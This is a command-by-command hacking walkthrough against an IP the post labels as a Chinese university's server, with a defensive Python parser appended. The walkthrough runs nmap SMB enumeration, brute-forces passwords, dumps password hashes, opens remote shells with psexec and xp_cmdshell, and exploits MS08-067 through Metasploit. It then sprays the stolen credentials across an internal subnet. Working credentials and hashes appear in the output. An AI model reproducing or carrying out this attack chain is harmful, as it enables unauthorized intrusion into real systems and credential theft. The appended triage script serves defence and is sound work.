Guangxi Normal University website: http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" // log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole // use the ms08-067 vulnerability in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the username and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful

Attack successful: a simple msf+nmap attack~~
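For the host owner's side, an added example that is not part of the original post: a small Python triage over the host-script output format the smb-enum-shares, smb-brute, smb-check-vulns and smb-pwdump scripts print above, turning each line into a finding to fix (anonymous share access, blank or guessable passwords, an unpatched MS08-067, LM hashes still being stored). The sample text it parses is constructed, not the post's output, and the only real constant is the well-known second half of the empty-password LM hash.

```python
import re

# Constructed sample in the layout the smb-* NSE scripts print in the post (not the
# post's own output); hashes are made up except the well-known empty-password LM half.
SAMPLE = """| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
| smb-check-vulns:
|_ MS08-067: VULNERABLE
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_ test:1002 => 0123456789ABCDEFAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210
"""

EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM("") half: present when the password is under 8 chars

def triage(text):
    """Return (severity, message) findings from NSE host-script output."""
    findings, section, share = [], None, None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()
        m = re.match(r"(smb-[\w-]+):$", line)
        if m:                                   # "| smb-brute:" opens a script section
            section = m.group(1)
        elif section == "smb-enum-shares":
            if not line.startswith("Anonymous access:"):
                share = line                    # share name precedes its access line
            elif "<none>" not in line:
                findings.append(("high", f"share {share} allows anonymous {line.split(':')[1].strip()}"))
        elif section == "smb-brute":
            m = re.match(r"(\S+):(\S+) => Login was successful", line)
            if m:
                sev = "critical" if m.group(2) == "<blank>" else "high"
                findings.append((sev, f"guessable credential for {m.group(1)}"))
        elif section == "smb-check-vulns" and line.endswith(": VULNERABLE"):
            findings.append(("critical", f"unpatched {line.split(':')[0]}"))
        elif section == "smb-pwdump":
            m = re.match(r"(\w+):(\d+) => ([^:]+):(.+)", line)
            if m and "NO PASSWORD" in m.group(4):   # NT hash equals NT("")
                findings.append(("critical", f"{m.group(1)} (RID {m.group(2)}): empty password"))
            elif m:                                 # any stored LM hash is weak; short passwords weaker
                note = "LM hash stored" + (", password shorter than 8 chars" if m.group(3).upper().endswith(EMPTY_LM_HALF) else "")
                findings.append(("medium", f"{m.group(1)} (RID {m.group(2)}): {note}"))
    return findings
```

Feed it the text between "Host script results:" and "Nmap done:" from a scan of your own hosts; "NOT VULNERABLE" and "<none>" lines produce no finding.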